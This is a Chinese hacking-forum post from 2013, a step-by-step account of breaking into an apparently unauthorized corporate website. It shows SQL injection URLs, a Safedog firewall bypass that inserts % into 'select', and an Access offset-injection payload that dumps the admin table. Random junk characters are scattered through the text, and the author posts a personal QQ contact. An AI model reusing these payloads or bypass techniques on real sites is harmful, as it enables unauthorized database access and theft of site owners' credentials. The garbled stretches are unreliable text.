找回密码
 立即注册
查看: 3020|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
& ~4 ^9 q2 X3 `8 h1 m8 ^9 p: O3 |, [* Y4 {9 Y# k5 N+ x
' j- F0 Z7 r7 ~4 z0 L
顺手加个admin, F/ y( z( c% w" x( o& k

' d) H" D' H6 X# b0 d
1 U0 o3 O+ N/ ^: d4 F7 p默认后台。/ W+ V) m1 `% J2 y- m
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
" a5 f0 z3 [1 j, ?8 ~
- b2 ?: m; m7 }8 S4 w  h
' ~1 M) r9 L# `$ C$ A/ q1 a; F
' e( _7 H  ?* r+ O' f( G5 q所以就不用御剑扫了,待会直接封IP。% e# b$ L  f0 d: K5 y# i1 i
, f8 I+ `$ A1 a! k
用order by语句判断是否存在注入。
" j$ O- X! c% H1 o0 V& ohttp://www.xxx.com /product_show.asp?id=997 order by 1
% d& V, ?! y6 O6 s% |http://www.xxx.com /product_show.asp?id=997 order by 100/ {: S9 [  R: G" x
现在存在注入,经测试后发现是9个字段。
/ M$ X0 z) ]% V5 b, w+ l6 L1 d
- h6 J, ^7 _) R" J接下来进行联合查询,猜是否存在admin表。. J) T" Y5 P2 w9 t4 q* q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​  t$ V9 y* K2 j0 E6 o6 q
" q) _% o: `" p% j+ u5 |

& F  h* U6 O' x1 |! m5 k) |- l1 }
2 n1 Z6 c/ v/ d; W在select中间加个%,se%lect绕过安全狗。
; G+ c) `! g$ c/ Q- |
( j, d* U. l2 O6 ?# X$ y/ W/ b& ]6 E5 O& i! g1 `! V
发现存在admin表,然后开始手工猜常用的字段。
" W) y; D5 ^! I纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
, |" j  @* h2 B& f0 O9 `
0 y- K! o+ a: b' t! t突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
# h1 g  `7 Y4 T
4 L1 Y" F; z$ Q  X科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。" G. r; a! m& T" N
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 z6 p* C% N  i* A- G6 ^好了,敏感内容出显了。​
! T6 R& C8 w8 f$ p- {! Z7 z! u  H9 b3 c2 {

& @: X( r+ d- M0 f% v( L: {
# }( C. d8 A) N6 s( x; l) x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表